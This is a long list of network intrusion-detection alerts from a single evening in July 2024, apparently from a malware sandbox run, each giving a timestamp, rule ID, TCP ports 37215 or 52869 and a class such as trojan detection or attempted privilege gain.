                      Timestamp:07/20/24-23:01:02.064358
                      SID:2835222
                      Source Port:42284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.683684
                      SID:2831300
                      Source Port:34076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2829579
                      Source Port:50346
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.928521
                      SID:2835222
                      Source Port:46762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.338159
                      SID:2027339
                      Source Port:55568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.345953
                      SID:2025132
                      Source Port:59176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.890780
                      SID:2025132
                      Source Port:48176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.595072
                      SID:2831300
                      Source Port:58938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.630327
                      SID:2027339
                      Source Port:44926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.416217
                      SID:2027339
                      Source Port:43360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634372
                      SID:2829579
                      Source Port:59056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2829579
                      Source Port:39918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.194576
                      SID:2835222
                      Source Port:59138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650975
                      SID:2829579
                      Source Port:35764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.778303
                      SID:2027339
                      Source Port:38944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.266134
                      SID:2027339
                      Source Port:33396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.315740
                      SID:2025132
                      Source Port:50866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.536863
                      SID:2831300
                      Source Port:48960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:04.592319
                      SID:2027339
                      Source Port:49786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.699478
                      SID:2027339
                      Source Port:39250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.285840
                      SID:2025132
                      Source Port:52268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.631937
                      SID:2829579
                      Source Port:45702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.365783
                      SID:2027339
                      Source Port:60722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.655207
                      SID:2027339
                      Source Port:47706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.097857
                      SID:2829579
                      Source Port:59062
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.649996
                      SID:2835222
                      Source Port:42010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.599362
                      SID:2027339
                      Source Port:53054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.982478
                      SID:2829579
                      Source Port:59400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633810
                      SID:2835222
                      Source Port:34066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:05.010861
                      SID:2027339
                      Source Port:58646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:12.234515
                      SID:2025132
                      Source Port:55384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.383355
                      SID:2027339
                      Source Port:44096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.525770
                      SID:2831300
                      Source Port:57812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.409249
                      SID:2831300
                      Source Port:58652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.267115
                      SID:2831300
                      Source Port:54964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.943792
                      SID:2027339
                      Source Port:41894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2829579
                      Source Port:56502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.329969
                      SID:2027339
                      Source Port:47578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.676253
                      SID:2027339
                      Source Port:44594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.578727
                      SID:2027339
                      Source Port:38080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.831747
                      SID:2025132
                      Source Port:37044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.093784
                      SID:2831300
                      Source Port:49082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.851237
                      SID:2027339
                      Source Port:53532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.366797
                      SID:2027339
                      Source Port:33794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.386032
                      SID:2027339
                      Source Port:37672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.747300
                      SID:2025132
                      Source Port:58464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.788008
                      SID:2027339
                      Source Port:41078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.404974
                      SID:2025132
                      Source Port:40958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.945183
                      SID:2025132
                      Source Port:33778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.352576
                      SID:2027339
                      Source Port:42072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221048
                      SID:2835222
                      Source Port:36278
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.659435
                      SID:2027339
                      Source Port:39710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.810143
                      SID:2027339
                      Source Port:37980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.285526
                      SID:2831300
                      Source Port:43896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.322405
                      SID:2027339
                      Source Port:35100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.412385
                      SID:2027339
                      Source Port:38334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.912435
                      SID:2025132
                      Source Port:59826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.191657
                      SID:2025132
                      Source Port:39676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.194576
                      SID:2829579
                      Source Port:59138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591863
                      SID:2027339
                      Source Port:46382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.453951
                      SID:2027339
                      Source Port:42502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048618
                      SID:2835222
                      Source Port:41346
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.648889
                      SID:2027339
                      Source Port:56418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.453485
                      SID:2027339
                      Source Port:34196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.100971
                      SID:2835222
                      Source Port:49124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.420081
                      SID:2027339
                      Source Port:45666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.064169
                      SID:2027339
                      Source Port:52738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.313969
                      SID:2831300
                      Source Port:48368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2835222
                      Source Port:50466
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.258056
                      SID:2025132
                      Source Port:40456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.220899
                      SID:2835222
                      Source Port:40788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.426187
                      SID:2025132
                      Source Port:36012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.370395
                      SID:2027339
                      Source Port:39598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:03:46.099099
                      SID:2027339
                      Source Port:53088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.164492
                      SID:2027339
                      Source Port:45442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.677519
                      SID:2835222
                      Source Port:44504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.459025
                      SID:2025132
                      Source Port:42738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.170008
                      SID:2831300
                      Source Port:60616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.588009
                      SID:2027339
                      Source Port:43106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.636583
                      SID:2027339
                      Source Port:43652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.252201
                      SID:2025132
                      Source Port:33870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.254249
                      SID:2025132
                      Source Port:40882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.490945
                      SID:2027339
                      Source Port:36502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.602356
                      SID:2831300
                      Source Port:44534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:00.056416
                      SID:2027339
                      Source Port:43614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.340273
                      SID:2027339
                      Source Port:45948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.005156
                      SID:2829579
                      Source Port:34400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.387850
                      SID:2025132
                      Source Port:50492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:11.791090
                      SID:2027339
                      Source Port:50920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2829579
                      Source Port:55258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.547419
                      SID:2027339
                      Source Port:55264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.095698
                      SID:2835222
                      Source Port:35250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2829579
                      Source Port:52358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.206220
                      SID:2027339
                      Source Port:37142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2829579
                      Source Port:55840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650643
                      SID:2829579
                      Source Port:59830
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.280927
                      SID:2027339
                      Source Port:45798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.856714
                      SID:2027339
                      Source Port:34874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2829579
                      Source Port:56198
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.019285
                      SID:2027339
                      Source Port:58760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.651026
                      SID:2835222
                      Source Port:38614
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.098864
                      SID:2831300
                      Source Port:42410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.031141
                      SID:2027339
                      Source Port:54370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.668073
                      SID:2835222
                      Source Port:35160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.095462
                      SID:2835222
                      Source Port:55122
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.469580
                      SID:2025132
                      Source Port:33848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.105395
                      SID:2829579
                      Source Port:42602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.608574
                      SID:2025132
                      Source Port:55524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.186066
                      SID:2027339
                      Source Port:49882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.828422
                      SID:2835222
                      Source Port:38032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.646615
                      SID:2027339
                      Source Port:54664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.888802
                      SID:2027339
                      Source Port:52984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2835222
                      Source Port:38098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.215876
                      SID:2027339
                      Source Port:52906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.934101
                      SID:2831300
                      Source Port:42244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.261844
                      SID:2831300
                      Source Port:36204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.075937
                      SID:2835222
                      Source Port:45130
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.385543
                      SID:2027339
                      Source Port:33372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.803911
                      SID:2831300
                      Source Port:58846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.528109
                      SID:2025132
                      Source Port:58076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.048479
                      SID:2025132
                      Source Port:36116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.357440
                      SID:2025132
                      Source Port:56164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2829579
                      Source Port:42152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.757783
                      SID:2027339
                      Source Port:49426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634497
                      SID:2829579
                      Source Port:41068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2835222
                      Source Port:41726
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221748
                      SID:2835222
                      Source Port:47728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.805210
                      SID:2027339
                      Source Port:55998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.525064
                      SID:2027339
                      Source Port:38412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2829579
                      Source Port:36250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2835222
                      Source Port:42308
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.632123
                      SID:2831300
                      Source Port:57086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.241196
                      SID:2027339
                      Source Port:60242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.134490
                      SID:2831300
                      Source Port:57054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.346494
                      SID:2025132
                      Source Port:60314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.124696
                      SID:2835222
                      Source Port:33298
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633275
                      SID:2829579
                      Source Port:39114
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.108019
                      SID:2831300
                      Source Port:33128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.974742
                      SID:2027339
                      Source Port:60824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.225146
                      SID:2027339
                      Source Port:47758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.141192
                      SID:2025132
                      Source Port:58726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.852602
                      SID:2831300
                      Source Port:41254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.988229
                      SID:2027339
                      Source Port:37986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.701160
                      SID:2831300
                      Source Port:42704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.912337
                      SID:2027339
                      Source Port:36424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.424201
                      SID:2831300
                      Source Port:57774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.236183
                      SID:2027339
                      Source Port:48494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2829579
                      Source Port:53214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.456461
                      SID:2027339
                      Source Port:51876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.654810
                      SID:2025132
                      Source Port:46434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2829579
                      Source Port:37116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.818739
                      SID:2027339
                      Source Port:49766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.541579
                      SID:2027339
                      Source Port:45090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2829579
                      Source Port:58578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.443693
                      SID:2025132
                      Source Port:58424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.114134
                      SID:2025132
                      Source Port:60424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.881105
                      SID:2025132
                      Source Port:33492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.314147
                      SID:2027339
                      Source Port:58596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.284457
                      SID:2027339
                      Source Port:53406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.462291
                      SID:2831300
                      Source Port:46370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:00.056416
                      SID:2831300
                      Source Port:55060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:02.632381
                      SID:2027339
                      Source Port:49310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.696197
                      SID:2027339
                      Source Port:41620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.440718
                      SID:2027339
                      Source Port:55302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.218458
                      SID:2835222
                      Source Port:51490
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.519460
                      SID:2027339
                      Source Port:36476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045144
                      SID:2829579
                      Source Port:38872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.156178
                      SID:2025132
                      Source Port:58330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.593640
                      SID:2027339
                      Source Port:50794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.778303
                      SID:2831300
                      Source Port:41608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.674251
                      SID:2027339
                      Source Port:49456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.829810
                      SID:2027339
                      Source Port:46942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.227976
                      SID:2829579
                      Source Port:39874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.684130
                      SID:2025132
                      Source Port:44022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.114267
                      SID:2829579
                      Source Port:48818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.526897
                      SID:2027339
                      Source Port:48868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.699842
                      SID:2025132
                      Source Port:57614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.303455
                      SID:2025132
                      Source Port:44668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.636703
                      SID:2831300
                      Source Port:37804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.952782
                      SID:2829579
                      Source Port:49764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.064169
                      SID:2027339
                      Source Port:43312
